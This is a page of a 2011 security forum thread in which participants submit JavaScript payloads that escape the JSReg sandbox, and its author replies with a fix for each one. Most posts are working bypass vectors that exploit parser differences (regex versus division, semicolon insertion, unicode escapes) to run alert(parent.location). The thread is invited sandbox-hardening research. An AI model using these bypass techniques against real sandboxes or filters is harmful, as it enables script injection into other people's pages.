Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...345678910111213Next
Current Page: 9 of 13
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: July 14, 2011 08:06PM

1. As I understand it, the latest fix does not solve the problem of differentiation between the block's delimiter and the object's literal, but it converts a JSReg-break in a syntax error, which is not dangerous.

for(;{}/1/1;){} --> for (;{}/(?:)/.$constructor$(/1/)1;){} // Syntax error
1/{}/alert(1)/1 --> 1/{}/(?:)/.$constructor$(/alert(1)/)1 // etc

I hope you clean it in the future.

2. Non-FF browsers

var x
1
/'lo/,alert(parent.location)//'


I have not watched the whole the changes yet.

3. /[]/]/ <-- this works in IE8 Standards mode too (tested on IE9) and fixed in IE9 Standards mode (blogpost).

4. // I don't know how to thank...

I must confess that I don't testing of filters, sandboxes and millions of other protections, as it might seem. My activity - it is just small reward for your ideas that you share with the world for many years, but not the result of your refined trolling ~ a year ago. :)) Otherwise, I would come to the party faster, does not it?
Thank you!

----------------------
~Veritas~



Edited 1 time(s). Last edit at 07/14/2011 08:10PM by LeverOne.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: July 15, 2011 06:02AM

LeverOne Wrote:
-------------------------------------------------------
> 1. As I understand it, the latest fix does not
> solve the problem of differentiation between the
> block's delimiter and the object's literal, but it
> converts a JSReg-break in a syntax error, which is
> not dangerous.
>
> for(;{}/1/1;){} --> for
> (;{}/(?:)/.$constructor$(/1/)1;){} // Syntax
> error
> 1/{}/alert(1)/1 -->
> 1/{}/(?:)/.$constructor$(/alert(1)/)1 // etc
>
> I hope you clean it in the future.

Yeah it's eliminates the difference between divide and regex by raising a syntax error because the regex is rewritten to force an error if it's used in a divide operation. Mike from the caja project pointed this idea out in caja and I thought it would be useful to apply here. Hopefully I can find a better fix

>
> 2. Non-FF browsers
>
> var x
> 1
> /'lo/,alert(parent.location)//'
>

Fixed this thanks

>
> I have not watched the whole the changes yet.
>
> 3. /[]/]/ <-- this works in IE8 Standards mode
> too (tested on IE9) and fixed in IE9 Standards
> mode (blogpost).

Ah thanks, I'll update the post. I thought it was 8 for some reason

> 4. // I don't know how to thank...
>
> I must confess that I don't testing of filters,
> sandboxes and millions of other protections, as it
> might seem. My activity - it is just small reward
> for your ideas that you share with the world for
> many years, but not the result of your refined
> trolling ~ a year ago. :)) Otherwise, I would come
> to the party faster, does not it?
> Thank you!


Hehe well thanks very much! It's very appreciated

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: July 15, 2011 10:12AM

var n
/'lo/,alert(parent.location)//'

----------------------
~Veritas~

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: July 15, 2011 11:35AM

I backed out of my var statement tracking since it clearly wasn't working and causing all sort of syntax errors. I now check for a new line followed by a "/" then automatically insert a semi-colon

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: July 18, 2011 09:42AM

while(0){x:1}/'lo/,alert(parent.location)//'

bug:

do{}while(0)

----------------------
~Veritas~

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: July 18, 2011 10:38AM

Fixed thanks!

I forgot to check for the last statement when the next curly begins. The no curly bug will be fixed in future if the sandbox fails to be broken. I'm tracking the opening and closing parens so it should in theory be pretty easy to fix

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: July 18, 2011 11:44AM

if(1){function x(){}/'lo/,alert(parent.location)}//'

----------------------
~Veritas~

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: July 18, 2011 12:52PM

thanks and fixed, the if statement wasn't being reset so the function was being detected as a function expression. The paren tracking is working well but it seems this vector you pointed out could be another weak area in my code, I may have to rewrite how jsreg detects functions, function expressions as well as block statements and object literals

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: July 18, 2011 09:32PM

I knew the way of exploitation by Jonas come in handy...

for(;function(){}['constructor']('alert(parent.location)')();lo){}

This means that in some cases we can bypass /(?:)/.$constructor$(/blabla/)

var x
  /'lo/,alert(parent.location)//'

----------------------
~Veritas~



Edited 1 time(s). Last edit at 07/18/2011 09:33PM by LeverOne.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: July 19, 2011 06:59AM

That is one sweet bypass, damn you :D

and fixed
I remove new lines and check if a eos should be added and when an array is detected I force a eos

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 07/19/2011 07:56AM by Gareth Heyes.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: July 19, 2011 11:36AM

1/ /./;~{
lo:{}/'/,alert(parent.location)//'/ /./}


bugs for TODO:

x=[];

x:for(;;){break x;}

----------------------
~Veritas~



Edited 2 time(s). Last edit at 07/19/2011 11:44AM by LeverOne.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: July 19, 2011 12:23PM

Fixed that VERY nice vector and fixed those bugs, in addition I've basically created a minifier and semi colon insertion since new lines can affect what an object is and a semi colon is very important for what happens next

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: July 19, 2011 09:18PM

GC only (tested on 14.0.825.0 dev-m Win)

/lo/\u002E\u003B\u0061\u006C\u0065\u0072\u0074\u0028\u0070\u0061\u0072\u0065\u006E\u0074\u005B\u0027\u006C\u006F\u0063\u0061\u0074\u0069\u006F\u006E\u0027\u005D\u0029\u002F\u002F


added later:

old issue:

if(0){}else{function x(){}/'lo/,alert(parent.location)}//'

try{function x(){}/'lo/,alert(parent.location)}catch(e){}//'

try{}catch(e){}finally{function x(){}/'lo/,alert(parent.location)}//'

bugs:

if(0){}
else{}

x=[
12];

----------------------
~Veritas~



Edited 3 time(s). Last edit at 07/20/2011 04:15PM by LeverOne.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: July 20, 2011 08:48AM

That one is beautiful! Looks like a work of art :)
Fix soon when I get time

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: July 20, 2011 06:30PM

Fixed em all apart from the if(0){}else{} bug I'll have to track if statements for that which I don't currently do, it's on my todo list though. I've no idea why I was auto decoding unicode, I simply removed it

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: July 20, 2011 09:05PM

function x(){}function y(){}/'lo/,alert(parent.location)//'

// FF only

function(lo)/'/;alert(parent.location)//'

----------------------
~Veritas~



Edited 2 time(s). Last edit at 07/20/2011 09:18PM by LeverOne.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: July 21, 2011 05:25AM

Thanks!
Fixed, checked for missing curly in function and changed function expression check to make sure function doesn't follow a function

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: July 21, 2011 11:25PM

function function(){}/'lo/,alert(parent.location)//'

1/
/./;~{
lo:{}/'/,alert(parent.location)//'}


bug:

alert([])

----------------------
~Veritas~



Edited 1 time(s). Last edit at 07/22/2011 12:13AM by LeverOne.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: July 22, 2011 05:56AM

Fixed! These are great attacks thanks

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: July 22, 2011 09:38AM

bugs:

[/x/]

[[]]

function x(){}(1)

function x()
{}


Great progress in terms of security! For example, I don't know how I'm going to bypass next time.

----------------------
~Veritas~

Options: ReplyQuote
Re: JSReg sandbox challenge
Date: July 22, 2011 09:53AM

Wow LeverOne, impressive stuff!

Here's a new kind of vector that I don't remember seeing before:

[]/0//alert(window[),('location'])

Translates into:

;[];/(?:)/.$constructor$(/0/)/$alert$($window$[J.P(),('location')])

The browser sees Array/0//comment, but JSReg sees Array;RegExp/alert(...)
In the comment we can put any syntax that will break the JSReg parser.

Another bug:
[0 for(x in 0)]

You should try to go for a full parser and not rely on the parser of the browser, since JSReg only handles a subset of what the browser can handle. If you have a full JS parser, then you can reject programs that do not adhere to the subset you allow. Now you can only make a best effort interpretation of the code, meaning that any differences between the parsers may lead to vulnerabilities.

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: July 22, 2011 11:41AM

@lever_one

Fixed those rewriting errors thanks!

@jonas

Quote

Another bug:
[0 for(x in 0)]

This isn't a bug, I don't allow generators. I check for any statements that don't have a "{" then raise a syntax error.

Quote

[]/0//alert(window[),('location'])

Impressive vector, here the regex logic was incorrect and now it correctly parses the comment and divide.

Quote

You should try to go for a full parser and not rely on the parser of the browser, since JSReg only handles a subset of what the browser can handle. If you have a full JS parser, then you can reject programs that do not adhere to the subset you allow. Now you can only make a best effort interpretation of the code, meaning that any differences between the parsers may lead to vulnerabilities.

Yeah I would do if I thought the attacks worked at the design level like before but in any of the cases recently submitted recently it's been human error with the logic of the syntax detection.

Now it's much stronger than previously but if you really want me to do a full parser please break it into pieces at the design level :D ideally I should wrap all objects and force them into their correct type as well but I'm seeing what's possible with the current method before I write more code. I don't think you'll be able to break it soon ;)

Then the big plan after it's assumed safe is modifying it the way slackers see it for example reduce code, wrap objects and anything else then we have an amazing sandbox to use on any project that we like

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 07/22/2011 11:42AM by Gareth Heyes.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: July 25, 2011 09:53AM

@Gareth

Fix for (1)\n/0// fails on Opera and IE in document mode <= than IE8

----------------------
~Veritas~

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: July 25, 2011 09:59AM

@LeverOne

Thanks! Damn all these browser differences.

Narrowed it down to this:-
alert(/^.+[^x]/.test("aaaaaaax"));

I was assuming that the negative char class wouldn't match, so now I do a match without a ^ and reverse the if statement instead. In other words fixed :) but this still doesn't explain why on some browsers it worked since their behaviour was the same.

UPDATE.....
So I've added missing curly support in statements now, JSReg will attempt to correct any missing curlys in functions and other statements

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 2 time(s). Last edit at 07/26/2011 08:02AM by Gareth Heyes.

Options: ReplyQuote
Re: JSReg sandbox challenge
Date: July 26, 2011 02:11PM

@Gareth - About the generator stuff; I know you don't allow them, but in the version I was using at that time the translation was [0 for $r$($x$ in 0)]. Now it works as it should! ;)

There are still some problems with Arrays and operators, but nothing I've managed to exploit..

[]+0
[]-0
[]*0
~[]

Some other problems:

++/0/[0]

[]?[]:[]

0+ +0

if(0){}else;

if(0)
{}

This could become something: [][[]]++<x+/>0/
Lots of confusion in that one, RegEx or E4X?

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: July 26, 2011 06:03PM

~function(lo)/**/{}/'/,alert(parent.location)}()//'

----------------------
~Veritas~



Edited 2 time(s). Last edit at 07/26/2011 10:22PM by LeverOne.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: July 26, 2011 06:28PM

@jonas

Thanks! Fixed most of those, generators aren't allowed since I have to insert curlys to fix for..in statements. The e4x one should be detected as I disable e4x and since the "<" has to occur without anything to the "left" it should be "impossible" to inject ;)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: July 26, 2011 06:29PM

@lever_one

Ugh. Might just have to disable curlys :(

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: July 26, 2011 10:23PM

function()lo
function(){}/'/,alert(parent.location)//'

bugs:

function()alert(arguments)

(function()alert(1))()

----------------------
~Veritas~

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: July 27, 2011 06:54AM

Fixed all those bugs, now I allow no curlys but don't insert them. Generators should work too.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Pages: PreviousFirst...345678910111213Next
Current Page: 9 of 13


Sorry, only registered users may post in this forum.